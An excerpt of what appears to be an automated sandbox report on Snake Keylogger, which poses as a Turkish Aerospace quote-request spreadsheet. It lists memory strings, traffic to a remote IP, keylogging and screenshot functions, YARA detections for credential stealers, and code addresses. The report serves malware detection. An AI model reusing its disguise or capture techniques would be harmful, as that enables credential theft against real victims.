Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002B38000.00000004.00000800.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000028D7000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.000000000286A000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000028AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4500304672.0000000003A72000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4500335062.0000000003813000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4500304672.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: WheTgQY.exe, 00000010.00000002.4491033663.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000028FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002C40000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000029DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lBeq
Source: WheTgQY.exe, 00000010.00000002.4491033663.00000000029D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/x

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49749 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot
Source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode
Source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.WheTgQY.exe.411c3d0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.WheTgQY.exe.411c3d0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.WheTgQY.exe.411c3d0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.WheTgQY.exe.415f3f0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.WheTgQY.exe.415f3f0.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.WheTgQY.exe.415f3f0.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.WheTgQY.exe.411c3d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.WheTgQY.exe.411c3d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.WheTgQY.exe.411c3d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 3948, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: WheTgQY.exe PID: 5456, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

.NET source code contains very large strings

Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, Form4.cs	Long String: Length: 169248
Source: WheTgQY.exe.0.dr, Form4.cs	Long String: Length: 169248

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_010CE044	0_2_010CE044
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_05BB8588	0_2_05BB8588
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_05BB0006	0_2_05BB0006
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_05BB0040	0_2_05BB0040
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_05BB8AA7	0_2_05BB8AA7
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_05BBB902	0_2_05BBB902
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_07565170	0_2_07565170
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_07560A20	0_2_07560A20
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_07565451	0_2_07565451
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_0756C458	0_2_0756C458
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_07565460	0_2_07565460
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_07565160	0_2_07565160
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_075641DF	0_2_075641DF
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_075641F0	0_2_075641F0
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_075641B9	0_2_075641B9
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_0756C020	0_2_0756C020
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_0756E0D0	0_2_0756E0D0
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_0756DC98	0_2_0756DC98
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_07562BF8	0_2_07562BF8
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_07560A10	0_2_07560A10
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_0756D860	0_2_0756D860
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_077C4E30	0_2_077C4E30
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_08F30A80	0_2_08F30A80
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_08F3F0A9	0_2_08F3F0A9
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 0_2_08F30A70	0_2_08F30A70
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_0308E044	9_2_0308E044
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_05C18588	9_2_05C18588
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_05C10040	9_2_05C10040
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_05C10007	9_2_05C10007
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_05C1B8F8	9_2_05C1B8F8
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_077C5460	9_2_077C5460
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_077C5170	9_2_077C5170
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_077C0A20	9_2_077C0A20
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_077CC458	9_2_077CC458
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_077C5451	9_2_077C5451
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_077C5160	9_2_077C5160
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_077C41F0	9_2_077C41F0
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_077C41EF	9_2_077C41EF
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_077C41B9	9_2_077C41B9
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_077CC020	9_2_077CC020
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_077CE0D0	9_2_077CE0D0
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_077CDC98	9_2_077CDC98
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_077C2BF8	9_2_077C2BF8
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_077C0A10	9_2_077C0A10
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_077CD860	9_2_077CD860
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_09070A80	9_2_09070A80
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_0907F0A9	9_2_0907F0A9
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_09070A70	9_2_09070A70
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_05C18ADA	9_2_05C18ADA
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 9_2_05C18AE8	9_2_05C18AE8
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_0111C147	10_2_0111C147
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_01115362	10_2_01115362
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_0111D278	10_2_0111D278
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_0111C468	10_2_0111C468
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_0111C738	10_2_0111C738
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_0111E988	10_2_0111E988
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_011169A0	10_2_011169A0
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_0111CA08	10_2_0111CA08
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_01119DE0	10_2_01119DE0
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_0111CCD8	10_2_0111CCD8
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_0111CFA9	10_2_0111CFA9
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_01116FC8	10_2_01116FC8
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_01113E09	10_2_01113E09
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_0111F630	10_2_0111F630
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_0111E97A	10_2_0111E97A
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_011139F0	10_2_011139F0
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_011129EC	10_2_011129EC
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_0111FA88	10_2_0111FA88
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_01113AA1	10_2_01113AA1
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055D9548	10_2_055D9548
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055D9C18	10_2_055D9C18
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055DE6B0	10_2_055DE6B0
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055D5028	10_2_055D5028
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055DD550	10_2_055DD550
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055DD540	10_2_055DD540
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055DDDFF	10_2_055DDDFF
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055DDDF1	10_2_055DDDF1
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055DFC68	10_2_055DFC68
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055DCCA0	10_2_055DCCA0
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055DEF60	10_2_055DEF60
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055D178F	10_2_055D178F
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055D17A0	10_2_055D17A0
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055D1E70	10_2_055D1E70
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055DDE00	10_2_055DDE00
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055D1E80	10_2_055D1E80
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055DE6AF	10_2_055DE6AF
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055DE6A0	10_2_055DE6A0
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055D2968	10_2_055D2968
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055DD999	10_2_055DD999
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055DD9A8	10_2_055DD9A8
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055DD9A7	10_2_055DD9A7
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055D0040	10_2_055D0040
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055D5018	10_2_055D5018
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055DF810	10_2_055DF810
